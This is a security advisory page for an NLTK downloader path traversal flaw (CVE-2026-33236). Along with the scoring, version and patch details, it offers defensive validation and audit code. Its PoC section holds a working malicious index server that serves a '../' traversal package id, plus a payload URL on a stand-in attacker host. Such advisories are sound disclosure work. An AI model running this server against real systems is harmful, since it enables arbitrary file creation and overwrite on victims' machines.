CVE-2026-33236

Description

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. An attacker who controls a remote XML index server can supply values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.
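
The kind of check whose absence the description refers to can be sketched as follows. This is an illustrative sketch only, not the code from the patch commit: the helper name `safe_package_path` and its parameters are hypothetical and are not part of NLTK. It joins a download root with untrusted `subdir` and `id` values and rejects any result that resolves outside that root.

```python
import os


def safe_package_path(download_dir, subdir, package_id):
    """Join untrusted index attributes onto download_dir, refusing escapes.

    Hypothetical helper for illustration; not part of NLTK.
    """
    root = os.path.realpath(download_dir)
    candidate = os.path.realpath(os.path.join(root, subdir, package_id))
    # commonpath() equals root only when candidate is root itself or lies inside it.
    inside = os.path.commonpath([root, candidate]) == root
    if not inside or candidate == root:
        raise ValueError(
            f"path escapes download directory: {subdir!r} / {package_id!r}"
        )
    return candidate
```

With this check, a benign pair such as `("corpora", "brown")` resolves to a path under the download root, while an `id` of `../../../../tmp/malicious_payload.txt` raises `ValueError` before anything is written.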

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
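
As a cross-check, the 8.1 base score can be reproduced from the vector string. The sketch below applies the CVSS v3.1 base-score equations for the Scope: Unchanged case only; the function names `roundup` and `base_score` are illustrative choices, and the metric weights are the ones published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a CVSS:3.1 vector with S:U."""
    # Skip the leading "CVSS:3.1" prefix and split the remaining "KEY:VALUE" pairs.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"))  # 8.1
```

For this vector the intermediate values are an exploitability sub-score of about 2.84 and an impact sub-score of about 5.18, which sum to roughly 8.01 and round up to 8.1.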

Configurations (Affected Products)

cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:* - VULNERABLE

NLTK <= 3.9.3
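
A quick way to test a version string against this range is sketched below. The helper names `parse_release` and `is_affected` are hypothetical, and the comparison looks only at the leading numeric release segment, so pre-release or local suffixes are ignored. The record names 3.9.3 as the last affected version but does not name a fixed release, so the sketch makes no claim about which later version contains the patch.

```python
import re


def parse_release(version):
    """Return the leading numeric release segment as a tuple, e.g. '3.9.3' -> (3, 9, 3)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version, last_affected="3.9.3"):
    """True when version is at or below the last affected release."""
    release = parse_release(version)
    limit = parse_release(last_affected)
    # Pad with zeros so that '3.9' compares as (3, 9, 0).
    width = max(len(release), len(limit))
    release += (0,) * (width - len(release))
    limit += (0,) * (width - len(limit))
    return release <= limit
```

The installed version can be obtained with `importlib.metadata.version("nltk")` and passed to `is_affected`.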

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Malicious XML Index Server Example (PoC Concept)
# This XML structure demonstrates how to inject path traversal.

import http.server
import socketserver

PORT = 8000

# Malicious XML payload containing path traversal
MALICIOUS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nltk_data>
    <packages>
        <package id="../../../../tmp/malicious_payload.txt" subdir="corpora">
            <url>http://attacker-server.com/payload.txt</url>
            <checksum type="sha256">dummy_checksum</checksum>
        </package>
    </packages>
</nltk_data>
"""

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write(MALICIOUS_XML.encode('utf-8'))
        print("[+] Sent malicious XML index to victim.")

# Bind to loopback only so the test server is not reachable from other hosts.
with socketserver.TCPServer(("127.0.0.1", PORT), MaliciousHandler) as httpd:
    print(f"[+] Malicious server running at port {PORT}")
    print("[+] Configure NLTK to use this server as an index and trigger download.")
    httpd.serve_forever()

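# Victim Side (Conceptual)
# Note: nltk.set_proxy() configures an HTTP proxy, not the index location.
# The index URL is passed to the Downloader constructor instead.
# from nltk.downloader import Downloader
# downloader = Downloader(server_index_url='http://127.0.0.1:8000/index.xml')
# downloader.download('malicious_payload') # Triggers the traversal on affected versions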
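
On the defensive side, an index file can be inspected for the kind of values shown in the payload above before it is trusted. The following is a minimal sketch, assuming the index uses `<package>` elements with `id` and `subdir` attributes as in the example; the function names `is_suspicious` and `audit_index` are hypothetical. It is not a substitute for upgrading past the patch commit, and the standard-library XML parser is itself not hardened against maliciously constructed documents.

```python
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath, PureWindowsPath


def is_suspicious(value):
    """Flag values that are rooted, carry a drive, or contain a '..' component."""
    # Check under both POSIX and Windows rules so either separator is caught.
    for flavour in (PurePosixPath, PureWindowsPath):
        path = flavour(value)
        if path.anchor or ".." in path.parts:
            return True
    return False


def audit_index(xml_text):
    """Return (id, subdir) pairs from <package> elements that look unsafe."""
    root = ET.fromstring(xml_text)
    findings = []
    for package in root.iter("package"):
        pkg_id = package.get("id", "")
        subdir = package.get("subdir", "")
        if is_suspicious(pkg_id) or is_suspicious(subdir):
            findings.append((pkg_id, subdir))
    return findings
```

Run against the example index, `audit_index` would report the single package whose `id` contains `../` sequences.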

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33236
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33236
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33236/
[4] VulDB https://vuldb.com/cve/CVE-2026-33236
[5] NLTK patch commit https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a
[6] GitHub Security Advisory https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33236", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:47.007", "lastModified": "2026-03-23T19:15:37.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue."}, {"lang": "es", "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, el descargador de NLTK no valida los atributos 'subdir' e 'id' al procesar archivos de índice XML remotos. Los atacantes pueden controlar un servidor de índice XML remoto para proporcionar valores maliciosos que contengan secuencias de salto de ruta (como '../'), lo que puede llevar a la creación arbitraria de directorios, creación arbitraria de archivos y sobrescritura arbitraria de archivos. El commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.3", "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"}]}]}], "references": [{"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}